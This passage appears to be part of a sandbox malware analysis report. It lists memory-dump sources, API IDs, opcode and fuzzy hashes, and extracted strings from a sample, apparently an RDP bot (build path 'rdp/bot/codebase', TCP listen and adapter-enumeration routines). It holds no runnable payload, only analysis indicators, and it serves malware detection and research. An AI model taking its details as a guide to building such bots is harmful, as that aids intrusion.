                  • Associated: 00000015.00000002.2484885042.00007FFE11ED2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484904334.00007FFE11EDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484920861.00007FFE11EDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484937141.00007FFE11EDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484954358.00007FFE11EE2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11ec0000_main.jbxd
                  Similarity
                  • API ID: Closefflushfwrite
                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                  • API String ID: 1001908780-1680961811
                  • Opcode ID: 98d8349ad0ad8563a4aac54408a1b4208963d96b0c40359daae556f45f636e14
                  • Instruction ID: d770e7abbcaa98278e9d79841efa38dd61ddc116d88c5184d3e9d9c4680be7d2
                  • Opcode Fuzzy Hash: 98d8349ad0ad8563a4aac54408a1b4208963d96b0c40359daae556f45f636e14
                  • Instruction Fuzzy Hash: 45F09C52608B4652EB518F81FC443BB625CAF447B4FC802B5DD4D466E0FF2DF9859304
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484854998.00007FFE11EC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE11EC0000, based on PE: true
                  • Associated: 00000015.00000002.2484834641.00007FFE11EC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484885042.00007FFE11ED2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484904334.00007FFE11EDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484920861.00007FFE11EDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484937141.00007FFE11EDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484954358.00007FFE11EE2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11ec0000_main.jbxd
                  Similarity
                  • API ID: Closefflushfwrite
                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                  • API String ID: 1001908780-1680961811
                  • Opcode ID: bb41b63993abec7c408ad49b714f270fcd64442e604e9d810aa8fc911f13786b
                  • Instruction ID: df2cd96a473b5bbccabafc8e7f93043f396135d58a53f332fedce50068341ce3
                  • Opcode Fuzzy Hash: bb41b63993abec7c408ad49b714f270fcd64442e604e9d810aa8fc911f13786b
                  • Instruction Fuzzy Hash: 43F09C52608B4652EB528F41FC443BB625CAF447B4FC802B5DD4D466E0FF2DF9859304
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484854998.00007FFE11EC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE11EC0000, based on PE: true
                  • Associated: 00000015.00000002.2484834641.00007FFE11EC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484885042.00007FFE11ED2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484904334.00007FFE11EDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484920861.00007FFE11EDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484937141.00007FFE11EDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484954358.00007FFE11EE2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11ec0000_main.jbxd
                  Similarity
                  • API ID: Closefflushfwrite
                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                  • API String ID: 1001908780-1680961811
                  • Opcode ID: bc364ee3c0204cc18faf25454832cb5fb0d7574441680ffd8687f8ddca3ccec5
                  • Instruction ID: 7ed9e30256452d0a6275bfda7d15274e4a1509d574642499ddafcbe7c71f7465
                  • Opcode Fuzzy Hash: bc364ee3c0204cc18faf25454832cb5fb0d7574441680ffd8687f8ddca3ccec5
                  • Instruction Fuzzy Hash: 44F09C52608A4652EB518F41FC443BB625CBF447B4FC802B5DD4D466E0FF2DF5859304
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484854998.00007FFE11EC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE11EC0000, based on PE: true
                  • Associated: 00000015.00000002.2484834641.00007FFE11EC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484885042.00007FFE11ED2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484904334.00007FFE11EDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484920861.00007FFE11EDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484937141.00007FFE11EDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484954358.00007FFE11EE2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11ec0000_main.jbxd
                  Similarity
                  • API ID: Closefflushfwrite
                  • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                  • API String ID: 1001908780-1680961811
                  • Opcode ID: 5a5f454751b329f477918e1b74ce8c9d1f5dbe2abfd7061627b6f44434bac4c8
                  • Instruction ID: ae40f86ca4435b31f063b66c2447bd2e2f9e9bcc13ab7efac2e44c1c0ebbba75
                  • Opcode Fuzzy Hash: 5a5f454751b329f477918e1b74ce8c9d1f5dbe2abfd7061627b6f44434bac4c8
                  • Instruction Fuzzy Hash: 92F09662608B4A52EB528F82FC443BB625CAF447B5FC802B5ED4D466E1FF2DF9859304
                  APIs
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true
                  • Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd
                  Similarity
                  • API ID: Sleepmemcpy
                  • String ID:
                  • API String ID: 1125407320-0
                  • Opcode ID: a353561d76903494636ec477018f7265d0b2c6ffd32db1de9122ce1526666027
                  • Instruction ID: 309efaa2cb18cb10259dc987b9eb08ae61cddbb36f74de60f506c0f034e1c8ef
                  • Opcode Fuzzy Hash: a353561d76903494636ec477018f7265d0b2c6ffd32db1de9122ce1526666027
                  • Instruction Fuzzy Hash: 2F310860E0CE0382F7319BE7A88427C325AAF447B0F6407B9D47D466F2DE2CE7859642
                  APIs
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484609499.00007FFE0EB41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0EB40000, based on PE: true
                  • Associated: 00000015.00000002.2484591156.00007FFE0EB40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484635439.00007FFE0EB56000.00000002.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484666608.00007FFE0EB60000.00000004.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484687240.00007FFE0EB63000.00000004.00000001.01000000.0000000E.sdmpDownload File
                  • Associated: 00000015.00000002.2484704200.00007FFE0EB64000.00000008.00000001.01000000.0000000E.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe0eb40000_main.jbxd
                  Similarity
                  • API ID: Sleepmemcpy
                  • String ID:
                  • API String ID: 1125407320-0
                  • Opcode ID: 0cb8941dfc163a413c5ab916b78a3d17a0994cdb19c6253a22ed711d911a51f6
                  • Instruction ID: 5cbd6e0f43837169666d4f5b09b899f6a8e5a4a6c1d290eb45965486bb63f2d6
                  • Opcode Fuzzy Hash: 0cb8941dfc163a413c5ab916b78a3d17a0994cdb19c6253a22ed711d911a51f6
                  • Instruction Fuzzy Hash: 7331D9A2E2970382F6306F68A8843792251FF84775F640331E4FD4A6F5DE2DE9459E81
                  APIs
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484499625.00007FFE0E161000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE0E160000, based on PE: true
                  • Associated: 00000015.00000002.2484478122.00007FFE0E160000.00000002.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484520770.00007FFE0E174000.00000002.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484539782.00007FFE0E17D000.00000004.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484557065.00007FFE0E180000.00000004.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484573253.00007FFE0E181000.00000008.00000001.01000000.00000010.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe0e160000_main.jbxd
                  Similarity
                  • API ID: Sleepmemcpy
                  • String ID:
                  • API String ID: 1125407320-0
                  • Opcode ID: 3d3b53d04c772b8df934e6e75b7e7394d6e1c1ef4915e661cc7242475e802ccf
                  • Instruction ID: c647a3e78296f41c0fa26a15a73ab8ee7f1f1b9dfdee4252dca916f587bc6732
                  • Opcode Fuzzy Hash: 3d3b53d04c772b8df934e6e75b7e7394d6e1c1ef4915e661cc7242475e802ccf
                  • Instruction Fuzzy Hash: E3310C21F0D603A2F6705B65E88427C2265AF44770F600377D8FE466F7DE2CEA85A781
                  APIs
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484854998.00007FFE11EC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE11EC0000, based on PE: true
                  • Associated: 00000015.00000002.2484834641.00007FFE11EC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484885042.00007FFE11ED2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484904334.00007FFE11EDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484920861.00007FFE11EDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484937141.00007FFE11EDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                  • Associated: 00000015.00000002.2484954358.00007FFE11EE2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11ec0000_main.jbxd
                  Similarity
                  • API ID: Sleepmemcpy
                  • String ID:
                  • API String ID: 1125407320-0
                  • Opcode ID: 992cbff283cf5bc95ae1a3ea0b4319c7fbf54e715062f432e6d1e15d965cf2f6
                  • Instruction ID: 02429f256fc01d5838e832e106884b126abc035b3381545a41791ebeb628ee2e
                  • Opcode Fuzzy Hash: 992cbff283cf5bc95ae1a3ea0b4319c7fbf54e715062f432e6d1e15d965cf2f6
                  • Instruction Fuzzy Hash: 6B310760B0CE4382EB20ABA6EC8437B2259AF45370F9013B6D47D467F1DE2CF6855751
                  APIs
                    • Part of subcall function 00007FF76A901360: GetModuleHandleExA.KERNEL32(?,?,?,?,?,?,00007FF76A9084AF), ref: 00007FF76A90137E
                  • SleepEx.KERNEL32 ref: 00007FF76A9088DC
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: HandleModuleSleep
                  • String ID:
                  • API String ID: 1071907932-0
                  • Opcode ID: 979f6ab677c7687cb865241237432280adb0046b4e29c36f948d58921f5010c4
                  • Instruction ID: 93e60936be1f98bcaa8b641ebd49656ae39e0c96908773cd592752a06179c83e
                  • Opcode Fuzzy Hash: 979f6ab677c7687cb865241237432280adb0046b4e29c36f948d58921f5010c4
                  • Instruction Fuzzy Hash: 0B01D122B0C743C2F7987614E4503BAB291AB943C4FB44078EA1ECB685EE6CD845C360
                  APIs
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: _errno$Heap$FreeProcessfclosefread
                  • String ID:
                  • API String ID: 4240746492-0
                  • Opcode ID: 06b5753a0f2153fadecf8515356ede5123c149dc1559c95b793d2786b5db2776
                  • Instruction ID: 05b9d96cf56d74709aedf7e1cf2d5d756e83743c8bfa2df28cdd6d6d8efd7081
                  • Opcode Fuzzy Hash: 06b5753a0f2153fadecf8515356ede5123c149dc1559c95b793d2786b5db2776
                  • Instruction Fuzzy Hash: DAE0D801F1835382FA702569028073585812F487C4FB614F88F0ED66E9CD3DE4010C20
                  APIs
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: _errno$Heap$FreeProcessfclosefread
                  • String ID:
                  • API String ID: 4240746492-0
                  • Opcode ID: 5eb821edd3b4ac3d11fb5a8a8cf5f479bd344658574371c11ea2e3b3b9955ca5
                  • Instruction ID: 96d91fd7480217c82c107adf8f0a36b3d41408be87374aa3a32b9b3a8b7eef27
                  • Opcode Fuzzy Hash: 5eb821edd3b4ac3d11fb5a8a8cf5f479bd344658574371c11ea2e3b3b9955ca5
                  • Instruction Fuzzy Hash: 95E0DF01F2839382FA7029690280B3586822F487C8FB614F88F0EE62EACD3EE4010C20
                  APIs
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: _errno$Heap$FreeProcessfclosefread
                  • String ID:
                  • API String ID: 4240746492-0
                  • Opcode ID: eca8601a8072f10b742a6ea828dc9ef14cccec53e02c73ff1a62bffbaf347bab
                  • Instruction ID: 0ca9047366400e143abf462401c42acc1fa475ad9d2d02541a016700985859bf
                  • Opcode Fuzzy Hash: eca8601a8072f10b742a6ea828dc9ef14cccec53e02c73ff1a62bffbaf347bab
                  • Instruction Fuzzy Hash: F4E0D801F1834281FA712569168073585812F447C4FB614F88F0ED62EACD3DE4010C20
                  APIs
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: _errno$Heap$FreeProcessfclosefread
                  • String ID:
                  • API String ID: 4240746492-0
                  • Opcode ID: 93779f5a2cdb3e04165489ec7973de93b07f8438cdc681d7751f1fbd96d9f5de
                  • Instruction ID: 459d7b9e9ee4ab082ca80c4bd4757cb9c06365d099181aac4fd4b86ab7f1ae0f
                  • Opcode Fuzzy Hash: 93779f5a2cdb3e04165489ec7973de93b07f8438cdc681d7751f1fbd96d9f5de
                  • Instruction Fuzzy Hash: 3BE0D801F1835381FA702569028073585822F487C4FB614F88F0ED62EACD3DE4010C20
                  APIs
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: _errno$Heap$FreeProcessfclosefread
                  • String ID:
                  • API String ID: 4240746492-0
                  • Opcode ID: 0f4c820b4593ff6fa6eb4d1d7b985b18c40b22b35b228e74236585271f35355d
                  • Instruction ID: 8320e24e408a0708995b2709846fc3d0b05a25b6dd632650a37c26277b704e3b
                  • Opcode Fuzzy Hash: 0f4c820b4593ff6fa6eb4d1d7b985b18c40b22b35b228e74236585271f35355d
                  • Instruction Fuzzy Hash: 90E02601F2839386FA7029690280B3586823F487C8FF614F88F0FE62EADD3EE4010C20
                  APIs
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: _errno$Heap$FreeProcessfclosefread
                  • String ID:
                  • API String ID: 4240746492-0
                  • Opcode ID: d9839dda6aa00f83f1b280c0522c91c52a71f8d5d8a1992868c318b81a1566b1
                  • Instruction ID: 45873bccf2c4a53eb0bcbc1cd6d33f40c48dceff4a0177e79ec1dff5bfbf519a
                  • Opcode Fuzzy Hash: d9839dda6aa00f83f1b280c0522c91c52a71f8d5d8a1992868c318b81a1566b1
                  • Instruction Fuzzy Hash: 58E02601F2839382FA7029690280B3586823F487C4FF614F88F0EE62EACD3EE0010C20
                  APIs
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: ServiceStatus
                  • String ID:
                  • API String ID: 3969395364-0
                  • Opcode ID: 4993fdc76b1177e06be1b464f55a433b82611d2e99cbe8385cbffbaa458d3ac6
                  • Instruction ID: c0b7ba2fd6b772380b957079cab47adc5fdcd6ceeb4ec18334fc7c68ff9b29d1
                  • Opcode Fuzzy Hash: 4993fdc76b1177e06be1b464f55a433b82611d2e99cbe8385cbffbaa458d3ac6
                  • Instruction Fuzzy Hash: 2BD06775D19702C9F705FF05E845124B670BF49385FE090B9C10C92230CE2C6A598728
                  APIs
                  Memory Dump Source
                  • Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true
                  • Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
                  • Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd
                  Similarity
                  • API ID: rand_s
                  • String ID:
                  • API String ID: 863162693-0
                  • Opcode ID: 34b79ae6e1dd47e5b081b7fbe00c12fbd074ba990cf07bcb48e6a06ddf1fcfa5
                  • Instruction ID: e7f4e532be69a4dade4dd10602b9e1090e044eaea4a6f33a18ee68383406f345
                  • Opcode Fuzzy Hash: 34b79ae6e1dd47e5b081b7fbe00c12fbd074ba990cf07bcb48e6a06ddf1fcfa5
                  • Instruction Fuzzy Hash: DDC00226A18540CAD620AB24E845259A770EB98348FD04165E65D82664CA3CD61ACF54
                  APIs
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484499625.00007FFE0E161000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE0E160000, based on PE: true
                  • Associated: 00000015.00000002.2484478122.00007FFE0E160000.00000002.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484520770.00007FFE0E174000.00000002.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484539782.00007FFE0E17D000.00000004.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484557065.00007FFE0E180000.00000004.00000001.01000000.00000010.sdmpDownload File
                  • Associated: 00000015.00000002.2484573253.00007FFE0E181000.00000008.00000001.01000000.00000010.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe0e160000_main.jbxd
                  Similarity
                  • API ID: CriticalEnterSection
                  • String ID:
                  • API String ID: 1904992153-0
                  • Opcode ID: 7abd05a5a67c31e03c5b12fe05f629d692a795e69a910426a5662404033e003a
                  • Instruction ID: 577923021f62a84cc450fc2b12bcfc820c37eea88e8fe73bf3fe5af8c4d76798
                  • Opcode Fuzzy Hash: 7abd05a5a67c31e03c5b12fe05f629d692a795e69a910426a5662404033e003a
                  • Instruction Fuzzy Hash: 55C08C50F1910AC2FB08A771B98103812206F9C700F001036C8EE42372CE1C98D94200
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true
                  • Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd
                  Similarity
                  • API ID: Heap$Process$AdaptersAllocInfo$Free
                  • String ID: (adapter_num != NULL)$(pref_adapter_type != NULL)$H:/Projects/rdp/bot/codebase/net.c$[D] (%s) -> Adapter detected(name=%s,desc=%s,type=%d)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> GetAdaptersInfo failed(res=%08lx)$[E] (%s) -> GetBestInterface failed(res=%08lx)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$net_info
                  • API String ID: 2437369060-1325175688
                  • Opcode ID: 564633fa592d41c422551b0d7afd0f666e805540f65a93ed4a43b2d479caf9d9
                  • Instruction ID: eac23918928386c92b040667c34832290662f70ef7a807d69fc240047ce1ac13
                  • Opcode Fuzzy Hash: 564633fa592d41c422551b0d7afd0f666e805540f65a93ed4a43b2d479caf9d9
                  • Instruction Fuzzy Hash: 7151A361A0CE4795FB529F67E8502B83369AF443F4F8440BAD94E462B6EE2CE909C701
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true
                  • Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                  • Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd
                  Similarity
                  • API ID: ErrorLast$bindfflushfwritehtonlhtonslistensetsockoptsocket
                  • String ID: [E] (%s) -> bind failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> listen failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$tcp_listen
                  • API String ID: 3590747132-3524496754
                  • Opcode ID: 7daf66edc36989b14c988206732aa7ab006f0ffe08b9452c87d7365b61838467
                  • Instruction ID: e570b936057412f2c265d99973e7f0b15e8b7609a142eadcd2c6a3d4460a0f2c
                  • Opcode Fuzzy Hash: 7daf66edc36989b14c988206732aa7ab006f0ffe08b9452c87d7365b61838467
